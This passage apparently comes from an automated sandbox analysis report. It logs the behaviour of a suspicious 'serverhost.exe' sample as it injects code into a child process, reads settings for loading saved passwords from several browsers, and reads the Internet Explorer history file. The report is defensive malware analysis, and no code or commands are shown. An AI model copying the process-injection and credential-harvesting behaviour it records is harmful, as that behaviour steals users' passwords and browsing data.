| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTimeFormatEx, address_out = 0x7662f21a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7661f70b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsValidLocaleName, address_out = 0x7661f71b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7661f72b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x765ceb4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String |
|
1 | ||
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77140000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = MSIApplicationLCID, data = 77 |
|
1 | |
| Module | Load | module_name = C:\PROGRA~1\MICROS~1\Office15\OLMAPI32.DLL, base_address = 0x63430000 |
|
1 | |
| File | Create | filename = C:\ProgramData\C572.tmp, desired_access = GENERIC_WRITE |
|
1 | |
| File | Write | filename = C:\ProgramData\C572.tmp, size = 58 |
|
1 | |
| System | Get Time | type = Ticks, time = 119293 |
|
2 | |
| COM | Create | interface = 9240A6CD-AF41-11D2-8C3B-00104B2A6676, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| File | Write | filename = C:\ProgramData\C572.tmp, size = 54 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll |
|
1 |
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Information | Value |
|---|---|
| PID | 0xc64 |
| Parent PID | 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C68
0x
C80
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc24 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc24 | address = 0x7ffd4008, size = 4 |
|
1 | |
| Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc24 | os_tid = 0xc68, address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x6eb50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x6eb56be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x758c0468 |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
18 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
